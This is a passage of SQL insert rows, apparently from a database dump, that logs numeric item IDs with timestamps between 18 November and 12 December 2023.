(8089, NULL, NULL, 2061, 1, '2023-11-18 15:08:43'),
(8090, NULL, NULL, 2062, 1, '2023-11-18 18:51:02'),
(8091, NULL, NULL, 2054, 1, '2023-11-19 02:51:55'),
(8092, NULL, NULL, 2059, 1, '2023-11-19 03:20:35'),
(8093, NULL, NULL, 2062, 1, '2023-11-19 08:11:05'),
(8094, NULL, NULL, 2064, 1, '2023-11-19 10:57:11'),
(8095, NULL, NULL, 2054, 1, '2023-11-19 23:07:17'),
(8096, NULL, NULL, 2063, 1, '2023-11-19 23:12:32'),
(8097, NULL, NULL, 2060, 1, '2023-11-19 23:12:34'),
(8098, NULL, NULL, 2061, 1, '2023-11-20 03:39:56'),
(8099, NULL, NULL, 2061, 1, '2023-11-20 04:02:08'),
(8100, NULL, NULL, 2063, 1, '2023-11-20 10:51:19'),
(8101, NULL, NULL, 2062, 1, '2023-11-20 13:26:56'),
(8102, NULL, NULL, 2054, 1, '2023-11-20 13:30:57'),
(8103, NULL, NULL, 2054, 1, '2023-11-20 17:03:16'),
(8104, NULL, NULL, 2059, 1, '2023-11-20 18:34:45'),
(8105, NULL, NULL, 2055, 1, '2023-11-21 02:12:31'),
(8106, NULL, NULL, 2063, 1, '2023-11-21 04:04:10'),
(8107, NULL, NULL, 2061, 1, '2023-11-21 05:13:49'),
(8108, NULL, NULL, 2060, 1, '2023-11-21 07:09:44'),
(8109, NULL, NULL, 2063, 1, '2023-11-21 07:22:20'),
(8110, NULL, NULL, 2058, 1, '2023-11-21 07:54:11'),
(8111, NULL, NULL, 2061, 1, '2023-11-21 08:00:31'),
(8112, NULL, NULL, 2055, 1, '2023-11-21 08:51:53'),
(8113, NULL, NULL, 2054, 1, '2023-11-21 09:44:14'),
(8114, NULL, NULL, 2061, 1, '2023-11-21 10:19:29'),
(8115, NULL, NULL, 2063, 1, '2023-11-21 11:02:41'),
(8116, NULL, NULL, 2062, 1, '2023-11-21 11:03:57'),
(8117, NULL, NULL, 2054, 1, '2023-11-21 12:30:49'),
(8118, NULL, NULL, 2058, 1, '2023-11-21 12:47:58'),
(8119, NULL, NULL, 2059, 1, '2023-11-21 12:50:24'),
(8120, NULL, NULL, 2064, 1, '2023-11-21 13:06:00'),
(8121, NULL, NULL, 2064, 1, '2023-11-21 14:56:14'),
(8122, NULL, NULL, 2060, 1, '2023-11-21 15:18:28'),
(8123, NULL, NULL, 2063, 1, '2023-11-21 15:30:36'),
(8124, NULL, NULL, 2058, 1, '2023-11-21 16:01:19'),
(8125, NULL, NULL, 2055, 1, '2023-11-21 16:57:32'),
(8126, NULL, NULL, 2055, 1, '2023-11-21 18:14:10'),
(8127, NULL, NULL, 2060, 1, '2023-11-21 18:23:54'),
(8128, NULL, NULL, 2063, 1, '2023-11-21 18:35:59'),
(8129, NULL, NULL, 2058, 1, '2023-11-21 19:05:03'),
(8130, NULL, NULL, 2061, 1, '2023-11-21 19:20:42'),
(8131, NULL, NULL, 2055, 1, '2023-11-21 19:56:33'),
(8132, NULL, NULL, 2061, 1, '2023-11-21 21:14:27'),
(8133, NULL, NULL, 2062, 1, '2023-11-21 21:57:01'),
(8134, NULL, NULL, 2054, 1, '2023-11-21 23:10:17'),
(8135, NULL, NULL, 2059, 1, '2023-11-21 23:27:42'),
(8136, NULL, NULL, 2059, 1, '2023-11-21 23:37:15'),
(8137, NULL, NULL, 2064, 1, '2023-11-21 23:41:40'),
(8138, NULL, NULL, 2060, 1, '2023-11-22 00:53:40'),
(8139, NULL, NULL, 2063, 1, '2023-11-22 01:07:48'),
(8140, NULL, NULL, 2058, 1, '2023-11-22 01:44:02'),
(8141, NULL, NULL, 2064, 1, '2023-11-22 02:11:54'),
(8142, NULL, NULL, 2060, 1, '2023-11-22 02:41:48'),
(8143, NULL, NULL, 2061, 1, '2023-11-22 02:58:53'),
(8144, NULL, NULL, 2063, 1, '2023-11-22 03:00:00'),
(8145, NULL, NULL, 2058, 1, '2023-11-22 03:45:04'),
(8146, NULL, NULL, 2055, 1, '2023-11-22 05:01:04'),
(8147, NULL, NULL, 2061, 1, '2023-11-22 07:01:15'),
(8148, NULL, NULL, 2061, 1, '2023-11-22 07:24:13'),
(8149, NULL, NULL, 2055, 1, '2023-11-22 07:24:14'),
(8150, NULL, NULL, 2059, 1, '2023-11-22 07:24:15'),
(8151, NULL, NULL, 2054, 1, '2023-11-22 07:24:17'),
(8152, NULL, NULL, 2060, 1, '2023-11-22 07:24:18'),
(8153, NULL, NULL, 2064, 1, '2023-11-22 07:24:19'),
(8154, NULL, NULL, 2063, 1, '2023-11-22 07:24:20'),
(8155, NULL, NULL, 2062, 1, '2023-11-22 07:24:23'),
(8156, NULL, NULL, 2058, 1, '2023-11-22 07:24:23'),
(8157, NULL, NULL, 2062, 1, '2023-11-22 08:02:34'),
(8158, NULL, NULL, 2054, 1, '2023-11-22 08:44:53'),
(8159, NULL, NULL, 2054, 1, '2023-11-22 10:01:00'),
(8160, NULL, NULL, 2059, 1, '2023-11-22 10:26:48'),
(8161, NULL, NULL, 2064, 1, '2023-11-22 10:47:46'),
(8162, NULL, NULL, 2053, 1, '2023-11-22 14:19:26'),
(8163, NULL, NULL, 2053, 1, '2023-11-22 22:28:08'),
(8164, NULL, NULL, 2054, 1, '2023-11-23 03:30:35'),
(8165, NULL, NULL, 2061, 1, '2023-11-23 04:53:50'),
(8166, NULL, NULL, 2061, 1, '2023-11-23 11:15:14'),
(8167, NULL, NULL, 2053, 1, '2023-11-23 12:45:35'),
(8168, NULL, NULL, 2064, 1, '2023-11-23 13:34:05'),
(8169, NULL, NULL, 2064, 1, '2023-11-23 19:35:08'),
(8170, NULL, NULL, 2061, 1, '2023-11-24 02:02:51'),
(8171, NULL, NULL, 2062, 1, '2023-11-24 04:15:56'),
(8172, NULL, NULL, 2064, 1, '2023-11-24 06:37:09'),
(8173, NULL, NULL, 2059, 1, '2023-11-24 13:26:44'),
(8174, NULL, NULL, 2058, 1, '2023-11-24 14:07:58'),
(8175, NULL, NULL, 2061, 1, '2023-11-24 14:09:19'),
(8176, NULL, NULL, 2059, 1, '2023-11-24 17:35:23'),
(8177, NULL, NULL, 2058, 1, '2023-11-24 18:41:16'),
(8178, NULL, NULL, 2062, 1, '2023-11-24 19:46:17'),
(8179, NULL, NULL, 2062, 1, '2023-11-24 19:46:22'),
(8180, NULL, NULL, 2054, 1, '2023-11-24 23:12:26'),
(8181, NULL, NULL, 2061, 1, '2023-11-25 00:36:28'),
(8182, NULL, NULL, 2059, 1, '2023-11-25 03:01:09'),
(8183, NULL, NULL, 2059, 1, '2023-11-25 03:36:27'),
(8184, NULL, NULL, 2062, 1, '2023-11-25 05:50:34'),
(8185, NULL, NULL, 2061, 1, '2023-11-25 07:30:07'),
(8186, NULL, NULL, 2063, 1, '2023-11-25 08:18:17'),
(8187, NULL, NULL, 2054, 1, '2023-11-25 08:18:17'),
(8188, NULL, NULL, 2055, 1, '2023-11-25 08:18:20'),
(8189, NULL, NULL, 2059, 1, '2023-11-25 08:18:20'),
(8190, NULL, NULL, 2062, 1, '2023-11-25 08:18:20'),
(8191, NULL, NULL, 2058, 1, '2023-11-25 08:18:25'),
(8192, NULL, NULL, 2060, 1, '2023-11-25 08:18:30'),
(8193, NULL, NULL, 2061, 1, '2023-11-25 08:18:34'),
(8194, NULL, NULL, 2064, 1, '2023-11-25 08:18:35'),
(8195, NULL, NULL, 2062, 1, '2023-11-25 09:06:04'),
(8196, NULL, NULL, 2061, 1, '2023-11-25 09:19:39'),
(8197, NULL, NULL, 2054, 1, '2023-11-25 09:24:19'),
(8198, NULL, NULL, 2064, 1, '2023-11-25 11:50:37'),
(8199, NULL, NULL, 2064, 1, '2023-11-25 11:50:56'),
(8200, NULL, NULL, 2064, 1, '2023-11-25 15:07:06'),
(8201, NULL, NULL, 2061, 1, '2023-11-25 16:16:26'),
(8202, NULL, NULL, 2060, 1, '2023-11-26 01:25:46'),
(8203, NULL, NULL, 2059, 1, '2023-11-26 01:33:31'),
(8204, NULL, NULL, 2063, 1, '2023-11-26 01:38:18'),
(8205, NULL, NULL, 2060, 1, '2023-11-26 02:34:42'),
(8206, NULL, NULL, 2063, 1, '2023-11-26 02:47:08'),
(8207, NULL, NULL, 2058, 1, '2023-11-26 03:18:57'),
(8208, NULL, NULL, 2062, 1, '2023-11-26 03:58:17'),
(8209, NULL, NULL, 2063, 1, '2023-11-26 03:59:40'),
(8210, NULL, NULL, 2055, 1, '2023-11-26 04:14:03'),
(8211, NULL, NULL, 2061, 1, '2023-11-26 05:38:03'),
(8212, NULL, NULL, 2062, 1, '2023-11-26 06:21:46'),
(8213, NULL, NULL, 2055, 1, '2023-11-26 07:09:25'),
(8214, NULL, NULL, 2054, 1, '2023-11-26 07:09:26'),
(8215, NULL, NULL, 2064, 1, '2023-11-26 07:09:36'),
(8216, NULL, NULL, 2063, 1, '2023-11-26 07:09:39'),
(8217, NULL, NULL, 2060, 1, '2023-11-26 07:09:40'),
(8218, NULL, NULL, 2062, 1, '2023-11-26 07:09:40'),
(8219, NULL, NULL, 2059, 1, '2023-11-26 07:09:42'),
(8220, NULL, NULL, 2061, 1, '2023-11-26 07:09:43'),
(8221, NULL, NULL, 2058, 1, '2023-11-26 07:09:45'),
(8222, NULL, NULL, 2054, 1, '2023-11-26 07:45:14'),
(8223, NULL, NULL, 2059, 1, '2023-11-26 08:03:52'),
(8224, NULL, NULL, 2064, 1, '2023-11-26 08:18:42'),
(8225, NULL, NULL, 2061, 1, '2023-11-26 09:00:07'),
(8226, NULL, NULL, 2064, 1, '2023-11-26 10:26:52'),
(8227, NULL, NULL, 2062, 1, '2023-11-26 11:05:24'),
(8228, NULL, NULL, 2055, 1, '2023-11-26 11:08:50'),
(8229, NULL, NULL, 2064, 1, '2023-11-26 12:53:35'),
(8230, NULL, NULL, 2053, 1, '2023-11-26 16:31:59'),
(8231, NULL, NULL, 2053, 1, '2023-11-26 17:45:58'),
(8232, NULL, NULL, 2062, 1, '2023-11-26 18:35:08'),
(8233, NULL, NULL, 2059, 1, '2023-11-26 18:41:06'),
(8234, NULL, NULL, 2061, 1, '2023-11-27 00:10:22'),
(8235, NULL, NULL, 2060, 1, '2023-11-27 02:04:42'),
(8236, NULL, NULL, 2063, 1, '2023-11-27 02:18:27'),
(8237, NULL, NULL, 2058, 1, '2023-11-27 02:52:34'),
(8238, NULL, NULL, 2060, 1, '2023-11-27 02:58:10'),
(8239, NULL, NULL, 2064, 1, '2023-11-27 02:58:12'),
(8240, NULL, NULL, 2060, 1, '2023-11-27 04:11:36'),
(8241, NULL, NULL, 2063, 1, '2023-11-27 04:23:39'),
(8242, NULL, NULL, 2058, 1, '2023-11-27 04:54:30'),
(8243, NULL, NULL, 2055, 1, '2023-11-27 05:48:12'),
(8244, NULL, NULL, 2060, 1, '2023-11-27 07:13:47'),
(8245, NULL, NULL, 2063, 1, '2023-11-27 07:32:29'),
(8246, NULL, NULL, 2058, 1, '2023-11-27 08:22:06'),
(8247, NULL, NULL, 2055, 1, '2023-11-27 09:48:47'),
(8248, NULL, NULL, 2061, 1, '2023-11-27 12:03:20'),
(8249, NULL, NULL, 2061, 1, '2023-11-27 12:04:28'),
(8250, NULL, NULL, 2062, 1, '2023-11-27 13:13:39'),
(8251, NULL, NULL, 2062, 1, '2023-11-27 14:43:07'),
(8252, NULL, NULL, 2054, 1, '2023-11-27 15:25:53'),
(8253, NULL, NULL, 2064, 1, '2023-11-27 15:33:31'),
(8254, NULL, NULL, 2059, 1, '2023-11-27 15:54:44'),
(8255, NULL, NULL, 2064, 1, '2023-11-27 16:17:55'),
(8256, NULL, NULL, 2060, 1, '2023-11-27 16:44:15'),
(8257, NULL, NULL, 2053, 1, '2023-11-27 19:20:00'),
(8258, NULL, NULL, 2054, 1, '2023-11-27 19:20:17'),
(8259, NULL, NULL, 2055, 1, '2023-11-27 19:20:57'),
(8260, NULL, NULL, 2064, 1, '2023-11-27 19:22:03'),
(8261, NULL, NULL, 2063, 1, '2023-11-27 19:22:08'),
(8262, NULL, NULL, 2062, 1, '2023-11-27 19:22:12'),
(8263, NULL, NULL, 2060, 1, '2023-11-27 19:22:16'),
(8264, NULL, NULL, 2059, 1, '2023-11-27 19:22:21'),
(8265, NULL, NULL, 2061, 1, '2023-11-27 19:22:25'),
(8266, NULL, NULL, 2058, 1, '2023-11-27 19:22:29'),
(8267, NULL, NULL, 2058, 1, '2023-11-27 19:40:44'),
(8268, NULL, NULL, 2061, 1, '2023-11-27 19:40:55'),
(8269, NULL, NULL, 2059, 1, '2023-11-27 19:41:06'),
(8270, NULL, NULL, 2060, 1, '2023-11-27 19:41:15'),
(8271, NULL, NULL, 2062, 1, '2023-11-27 19:41:25'),
(8272, NULL, NULL, 2063, 1, '2023-11-27 19:41:31'),
(8273, NULL, NULL, 2064, 1, '2023-11-27 19:41:40'),
(8274, NULL, NULL, 2055, 1, '2023-11-27 19:42:24'),
(8275, NULL, NULL, 2054, 1, '2023-11-27 19:42:27'),
(8276, NULL, NULL, 2053, 1, '2023-11-27 19:42:31'),
(8277, NULL, NULL, 2060, 1, '2023-11-27 22:50:13'),
(8278, NULL, NULL, 2064, 1, '2023-11-28 00:48:06'),
(8279, NULL, NULL, 2064, 1, '2023-11-28 00:48:09'),
(8280, NULL, NULL, 2064, 1, '2023-11-28 00:48:11'),
(8281, NULL, NULL, 2063, 1, '2023-11-28 00:48:14'),
(8282, NULL, NULL, 2062, 1, '2023-11-28 00:48:17'),
(8283, NULL, NULL, 2061, 1, '2023-11-28 00:48:19'),
(8284, NULL, NULL, 2060, 1, '2023-11-28 00:48:21'),
(8285, NULL, NULL, 2059, 1, '2023-11-28 00:48:24'),
(8286, NULL, NULL, 2058, 1, '2023-11-28 00:48:26'),
(8287, NULL, NULL, 2055, 1, '2023-11-28 00:48:29'),
(8288, NULL, NULL, 2054, 1, '2023-11-28 00:48:31'),
(8289, NULL, NULL, 2054, 1, '2023-11-28 01:44:14'),
(8290, NULL, NULL, 2054, 1, '2023-11-28 05:47:25'),
(8291, NULL, NULL, 2064, 1, '2023-11-28 05:47:26'),
(8292, NULL, NULL, 2063, 1, '2023-11-28 06:31:10'),
(8293, NULL, NULL, 2062, 1, '2023-11-28 08:34:35'),
(8294, NULL, NULL, 2060, 1, '2023-11-28 08:34:40'),
(8295, NULL, NULL, 2059, 1, '2023-11-28 08:34:41'),
(8296, NULL, NULL, 2061, 1, '2023-11-28 08:34:44'),
(8297, NULL, NULL, 2064, 1, '2023-11-28 08:34:48'),
(8298, NULL, NULL, 2055, 1, '2023-11-28 08:34:51'),
(8299, NULL, NULL, 2058, 1, '2023-11-28 08:34:52'),
(8300, NULL, NULL, 2063, 1, '2023-11-28 08:39:43'),
(8301, NULL, NULL, 2054, 1, '2023-11-28 08:39:43'),
(8302, NULL, NULL, 2054, 1, '2023-11-28 09:09:45'),
(8303, NULL, NULL, 2061, 1, '2023-11-28 10:06:28'),
(8304, NULL, NULL, 2064, 1, '2023-11-28 12:15:12'),
(8305, NULL, NULL, 2061, 1, '2023-11-28 12:23:42'),
(8306, NULL, NULL, 2062, 1, '2023-11-28 17:40:23'),
(8307, NULL, NULL, 2064, 1, '2023-11-28 20:41:21'),
(8308, NULL, NULL, 2059, 1, '2023-11-28 22:33:53'),
(8309, NULL, NULL, 2064, 1, '2023-11-28 23:29:32'),
(8310, NULL, NULL, 2054, 1, '2023-11-29 02:53:13'),
(8311, NULL, NULL, 2059, 1, '2023-11-29 06:09:49'),
(8312, NULL, NULL, 2055, 1, '2023-11-29 06:17:27'),
(8313, NULL, NULL, 2060, 1, '2023-11-29 06:34:17'),
(8314, NULL, NULL, 2063, 1, '2023-11-29 08:44:15'),
(8315, NULL, NULL, 2053, 1, '2023-11-29 20:11:15'),
(8316, NULL, NULL, 2064, 1, '2023-11-30 01:58:41'),
(8317, NULL, NULL, 2055, 1, '2023-11-30 02:26:04'),
(8318, NULL, NULL, 2058, 1, '2023-11-30 02:48:11'),
(8319, NULL, NULL, 2061, 1, '2023-11-30 02:49:02'),
(8320, NULL, NULL, 2060, 1, '2023-11-30 02:49:51'),
(8321, NULL, NULL, 2059, 1, '2023-11-30 02:50:33'),
(8322, NULL, NULL, 2063, 1, '2023-11-30 02:51:36'),
(8323, NULL, NULL, 2062, 1, '2023-11-30 02:52:26'),
(8324, NULL, NULL, 2064, 1, '2023-11-30 02:53:24'),
(8325, NULL, NULL, 2054, 1, '2023-11-30 02:58:54'),
(8326, NULL, NULL, 2053, 1, '2023-11-30 03:41:50'),
(8327, NULL, NULL, 2053, 1, '2023-11-30 04:42:24'),
(8328, NULL, NULL, 2061, 1, '2023-11-30 05:23:07'),
(8329, NULL, NULL, 2063, 1, '2023-11-30 08:44:15'),
(8330, NULL, NULL, 2063, 1, '2023-11-30 11:15:02'),
(8331, NULL, NULL, 2058, 1, '2023-11-30 11:25:25'),
(8332, NULL, NULL, 2053, 1, '2023-11-30 13:03:50'),
(8333, NULL, NULL, 2063, 1, '2023-11-30 15:14:42'),
(8334, NULL, NULL, 2060, 1, '2023-11-30 23:56:24'),
(8335, NULL, NULL, 2064, 1, '2023-12-01 04:17:19'),
(8336, NULL, NULL, 2061, 1, '2023-12-01 04:49:39'),
(8337, NULL, NULL, 2059, 1, '2023-12-01 06:11:58'),
(8338, NULL, NULL, 2062, 1, '2023-12-01 06:23:39'),
(8339, NULL, NULL, 2061, 1, '2023-12-01 07:14:09'),
(8340, NULL, NULL, 2060, 1, '2023-12-01 08:47:33'),
(8341, NULL, NULL, 2061, 1, '2023-12-01 13:06:36'),
(8342, NULL, NULL, 2060, 1, '2023-12-01 15:29:43'),
(8343, NULL, NULL, 2064, 1, '2023-12-01 15:29:59'),
(8344, NULL, NULL, 2060, 1, '2023-12-01 18:14:17'),
(8345, NULL, NULL, 2053, 1, '2023-12-01 20:42:46'),
(8346, NULL, NULL, 2060, 1, '2023-12-01 23:56:26'),
(8347, NULL, NULL, 2062, 1, '2023-12-02 03:29:05'),
(8348, NULL, NULL, 2060, 1, '2023-12-02 04:52:22'),
(8349, NULL, NULL, 2053, 1, '2023-12-02 05:13:25'),
(8350, NULL, NULL, 2058, 1, '2023-12-02 05:52:32'),
(8351, NULL, NULL, 2062, 1, '2023-12-02 05:53:43'),
(8352, NULL, NULL, 2058, 1, '2023-12-02 06:35:59'),
(8353, NULL, NULL, 2063, 1, '2023-12-02 11:03:47'),
(8354, NULL, NULL, 2059, 1, '2023-12-02 11:46:50'),
(8355, NULL, NULL, 2060, 1, '2023-12-02 13:12:58'),
(8356, NULL, NULL, 2064, 1, '2023-12-02 15:00:13'),
(8357, NULL, NULL, 2063, 1, '2023-12-02 15:18:30'),
(8358, NULL, NULL, 2061, 1, '2023-12-02 18:18:37'),
(8359, NULL, NULL, 2064, 1, '2023-12-02 19:01:26'),
(8360, NULL, NULL, 2054, 1, '2023-12-02 19:25:36'),
(8361, NULL, NULL, 2061, 1, '2023-12-02 19:29:40'),
(8362, NULL, NULL, 2055, 1, '2023-12-02 19:56:44'),
(8363, NULL, NULL, 2062, 1, '2023-12-02 23:21:15'),
(8364, NULL, NULL, 2055, 1, '2023-12-03 02:31:58'),
(8365, NULL, NULL, 2058, 1, '2023-12-03 06:04:17'),
(8366, NULL, NULL, 2059, 1, '2023-12-03 08:17:01'),
(8367, NULL, NULL, 2064, 1, '2023-12-03 10:43:56'),
(8368, NULL, NULL, 2058, 1, '2023-12-03 13:50:32'),
(8369, NULL, NULL, 2059, 1, '2023-12-03 15:28:26'),
(8370, NULL, NULL, 2054, 1, '2023-12-03 15:44:08'),
(8371, NULL, NULL, 2063, 1, '2023-12-03 16:17:58'),
(8372, NULL, NULL, 2061, 1, '2023-12-03 16:47:15'),
(8373, NULL, NULL, 2061, 1, '2023-12-04 02:02:24'),
(8374, NULL, NULL, 2061, 1, '2023-12-04 02:02:31'),
(8375, NULL, NULL, 2061, 1, '2023-12-04 06:39:51'),
(8376, NULL, NULL, 2055, 1, '2023-12-04 07:01:03'),
(8377, NULL, NULL, 2059, 1, '2023-12-04 09:36:16'),
(8378, NULL, NULL, 2061, 1, '2023-12-04 12:37:46'),
(8379, NULL, NULL, 2062, 1, '2023-12-04 14:02:27'),
(8380, NULL, NULL, 2064, 1, '2023-12-04 14:17:57'),
(8381, NULL, NULL, 2059, 1, '2023-12-04 16:42:05'),
(8382, NULL, NULL, 2061, 1, '2023-12-04 20:39:03'),
(8383, NULL, NULL, 2061, 1, '2023-12-05 03:25:51'),
(8384, NULL, NULL, 2064, 1, '2023-12-05 03:26:22'),
(8385, NULL, NULL, 2055, 1, '2023-12-05 04:52:33'),
(8386, NULL, NULL, 2054, 1, '2023-12-05 04:53:56'),
(8387, NULL, NULL, 2053, 1, '2023-12-05 04:55:18'),
(8388, NULL, NULL, 2059, 1, '2023-12-05 05:22:54'),
(8389, NULL, NULL, 2059, 1, '2023-12-05 07:43:53'),
(8390, NULL, NULL, 2055, 1, '2023-12-05 08:08:25'),
(8391, NULL, NULL, 2055, 1, '2023-12-05 08:22:45'),
(8392, NULL, NULL, 2064, 1, '2023-12-05 09:56:07'),
(8393, NULL, NULL, 2064, 1, '2023-12-05 10:02:36'),
(8394, NULL, NULL, 2064, 1, '2023-12-05 14:52:00'),
(8395, NULL, NULL, 2063, 1, '2023-12-05 16:43:32'),
(8396, NULL, NULL, 2060, 1, '2023-12-05 20:50:02'),
(8397, NULL, NULL, 2061, 1, '2023-12-05 21:27:05'),
(8398, NULL, NULL, 2055, 1, '2023-12-05 23:33:14'),
(8399, NULL, NULL, 2061, 1, '2023-12-05 23:34:19'),
(8400, NULL, NULL, 2064, 1, '2023-12-05 23:35:24'),
(8401, NULL, NULL, 2053, 1, '2023-12-05 23:36:31'),
(8402, NULL, NULL, 2054, 1, '2023-12-05 23:37:34'),
(8403, NULL, NULL, 2060, 1, '2023-12-05 23:41:40'),
(8404, NULL, NULL, 2058, 1, '2023-12-05 23:42:27'),
(8405, NULL, NULL, 2063, 1, '2023-12-05 23:42:39'),
(8406, NULL, NULL, 2062, 1, '2023-12-05 23:43:33'),
(8407, NULL, NULL, 2061, 1, '2023-12-05 23:44:35'),
(8408, NULL, NULL, 2061, 1, '2023-12-06 02:01:49'),
(8409, NULL, NULL, 2059, 1, '2023-12-06 04:31:16'),
(8410, NULL, NULL, 2059, 1, '2023-12-06 04:31:18'),
(8411, NULL, NULL, 2060, 1, '2023-12-06 09:58:35'),
(8412, NULL, NULL, 2059, 1, '2023-12-06 13:25:14'),
(8413, NULL, NULL, 2060, 1, '2023-12-06 13:45:03'),
(8414, NULL, NULL, 2059, 1, '2023-12-06 14:39:53'),
(8415, NULL, NULL, 2059, 1, '2023-12-07 03:52:32'),
(8416, NULL, NULL, 2063, 1, '2023-12-07 05:12:59'),
(8417, NULL, NULL, 2055, 1, '2023-12-07 06:48:57'),
(8418, NULL, NULL, 2060, 1, '2023-12-07 11:56:04'),
(8419, NULL, NULL, 2063, 1, '2023-12-07 12:02:04'),
(8420, NULL, NULL, 2053, 1, '2023-12-07 12:02:31'),
(8421, NULL, NULL, 2064, 1, '2023-12-07 17:49:51'),
(8422, NULL, NULL, 2062, 1, '2023-12-07 18:01:32'),
(8423, NULL, NULL, 2060, 1, '2023-12-07 18:54:03'),
(8424, NULL, NULL, 2064, 1, '2023-12-08 00:01:37'),
(8425, NULL, NULL, 2059, 1, '2023-12-08 03:28:29'),
(8426, NULL, NULL, 2058, 1, '2023-12-08 04:53:10'),
(8427, NULL, NULL, 2061, 1, '2023-12-08 04:54:36'),
(8428, NULL, NULL, 2054, 1, '2023-12-08 11:49:57'),
(8429, NULL, NULL, 2064, 1, '2023-12-08 13:50:53'),
(8430, NULL, NULL, 2063, 1, '2023-12-08 14:00:14'),
(8431, NULL, NULL, 2063, 1, '2023-12-08 14:53:57'),
(8432, NULL, NULL, 2063, 1, '2023-12-08 15:17:15'),
(8433, NULL, NULL, 2060, 1, '2023-12-08 15:48:44'),
(8434, NULL, NULL, 2064, 1, '2023-12-08 16:47:21'),
(8435, NULL, NULL, 2054, 1, '2023-12-08 17:17:25'),
(8436, NULL, NULL, 2064, 1, '2023-12-08 17:45:16'),
(8437, NULL, NULL, 2064, 1, '2023-12-08 17:45:18'),
(8438, NULL, NULL, 2064, 1, '2023-12-08 17:45:20'),
(8439, NULL, NULL, 2064, 1, '2023-12-08 17:45:23'),
(8440, NULL, NULL, 2063, 1, '2023-12-08 17:45:26'),
(8441, NULL, NULL, 2063, 1, '2023-12-08 17:45:28'),
(8442, NULL, NULL, 2062, 1, '2023-12-08 17:45:30'),
(8443, NULL, NULL, 2062, 1, '2023-12-08 17:45:32'),
(8444, NULL, NULL, 2061, 1, '2023-12-08 17:45:34'),
(8445, NULL, NULL, 2061, 1, '2023-12-08 17:45:36'),
(8446, NULL, NULL, 2060, 1, '2023-12-08 17:45:38'),
(8447, NULL, NULL, 2060, 1, '2023-12-08 17:45:40'),
(8448, NULL, NULL, 2059, 1, '2023-12-08 17:45:42'),
(8449, NULL, NULL, 2059, 1, '2023-12-08 17:45:45'),
(8450, NULL, NULL, 2058, 1, '2023-12-08 17:45:46'),
(8451, NULL, NULL, 2058, 1, '2023-12-08 17:45:48'),
(8452, NULL, NULL, 2055, 1, '2023-12-08 17:45:50'),
(8453, NULL, NULL, 2055, 1, '2023-12-08 17:45:52'),
(8454, NULL, NULL, 2061, 1, '2023-12-08 17:45:54'),
(8455, NULL, NULL, 2061, 1, '2023-12-08 17:45:55'),
(8456, NULL, NULL, 2059, 1, '2023-12-08 17:45:59'),
(8457, NULL, NULL, 2059, 1, '2023-12-08 17:46:00'),
(8458, NULL, NULL, 2058, 1, '2023-12-08 17:46:03'),
(8459, NULL, NULL, 2058, 1, '2023-12-08 17:46:05'),
(8460, NULL, NULL, 2054, 1, '2023-12-08 17:46:08'),
(8461, NULL, NULL, 2054, 1, '2023-12-08 17:46:11'),
(8462, NULL, NULL, 2064, 1, '2023-12-08 17:46:14'),
(8463, NULL, NULL, 2064, 1, '2023-12-08 17:46:17'),
(8464, NULL, NULL, 2064, 1, '2023-12-08 17:46:19'),
(8465, NULL, NULL, 2063, 1, '2023-12-08 17:46:23'),
(8466, NULL, NULL, 2063, 1, '2023-12-08 17:46:25'),
(8467, NULL, NULL, 2062, 1, '2023-12-08 17:46:29'),
(8468, NULL, NULL, 2062, 1, '2023-12-08 17:46:31'),
(8469, NULL, NULL, 2061, 1, '2023-12-08 17:46:34'),
(8470, NULL, NULL, 2061, 1, '2023-12-08 17:46:36'),
(8471, NULL, NULL, 2060, 1, '2023-12-08 18:12:45'),
(8472, NULL, NULL, 2064, 1, '2023-12-08 18:26:36'),
(8473, NULL, NULL, 2054, 1, '2023-12-08 20:06:38'),
(8474, NULL, NULL, 2061, 1, '2023-12-09 01:24:56'),
(8475, NULL, NULL, 2055, 1, '2023-12-09 02:05:49'),
(8476, NULL, NULL, 2059, 1, '2023-12-09 03:33:06'),
(8477, NULL, NULL, 2062, 1, '2023-12-09 03:59:02'),
(8478, NULL, NULL, 2059, 1, '2023-12-09 05:51:31'),
(8479, NULL, NULL, 2061, 1, '2023-12-09 06:50:00'),
(8480, NULL, NULL, 2064, 1, '2023-12-09 06:50:04'),
(8481, NULL, NULL, 2061, 1, '2023-12-09 06:50:12'),
(8482, NULL, NULL, 2058, 1, '2023-12-09 09:01:11'),
(8483, NULL, NULL, 2059, 1, '2023-12-09 14:29:18'),
(8484, NULL, NULL, 2062, 1, '2023-12-09 16:01:00'),
(8485, NULL, NULL, 2062, 1, '2023-12-09 16:01:01'),
(8486, NULL, NULL, 2061, 1, '2023-12-09 17:47:47'),
(8487, NULL, NULL, 2064, 1, '2023-12-09 17:47:48'),
(8488, NULL, NULL, 2064, 1, '2023-12-09 17:48:26'),
(8489, NULL, NULL, 2059, 1, '2023-12-10 05:11:59'),
(8490, NULL, NULL, 2055, 1, '2023-12-10 11:51:21'),
(8491, NULL, NULL, 2058, 1, '2023-12-10 13:58:49'),
(8492, NULL, NULL, 2061, 1, '2023-12-10 15:31:14'),
(8493, NULL, NULL, 2061, 1, '2023-12-10 17:49:14'),
(8494, NULL, NULL, 2061, 1, '2023-12-10 17:49:14'),
(8495, NULL, NULL, 2061, 1, '2023-12-10 17:49:15'),
(8496, NULL, NULL, 2061, 1, '2023-12-10 17:49:17'),
(8497, NULL, NULL, 2061, 1, '2023-12-10 17:49:17'),
(8498, NULL, NULL, 2063, 1, '2023-12-10 21:49:22'),
(8499, NULL, NULL, 2055, 1, '2023-12-10 23:24:18'),
(8500, NULL, NULL, 2062, 1, '2023-12-11 03:55:32'),
(8501, NULL, NULL, 2060, 1, '2023-12-11 12:01:47'),
(8502, NULL, NULL, 2060, 1, '2023-12-11 12:24:16'),
(8503, NULL, NULL, 2055, 1, '2023-12-11 15:57:55'),
(8504, NULL, NULL, 2064, 1, '2023-12-11 18:19:08'),
(8505, NULL, NULL, 2053, 1, '2023-12-11 18:38:54'),
(8506, NULL, NULL, 2062, 1, '2023-12-11 21:29:51'),
(8507, NULL, NULL, 2062, 1, '2023-12-12 03:57:53'),
(8508, NULL, NULL, 2062, 1, '2023-12-12 03:57:56'),
(8509, NULL, NULL, 2062, 1, '2023-12-12 03:58:00'),
(8510, NULL, NULL, 2064, 1, '2023-12-12 07:04:36'),
(8511, NULL, NULL, 2059, 1, '2023-12-12 08:01:54'),
(8512, NULL, NULL, 2055, 1, '2023-12-12 11:49:15'),
(8513, NULL, NULL, 2054, 1, '2023-12-12 11:50:41'),
(8514, NULL, NULL, 2064, 1, '2023-12-12 13:45:21'),
(8515, NULL, NULL, 2055, 1, '2023-12-12 20:09:46'),
(8516, NULL, NULL, 2064, 1, '2023-12-12 20:09:56'),
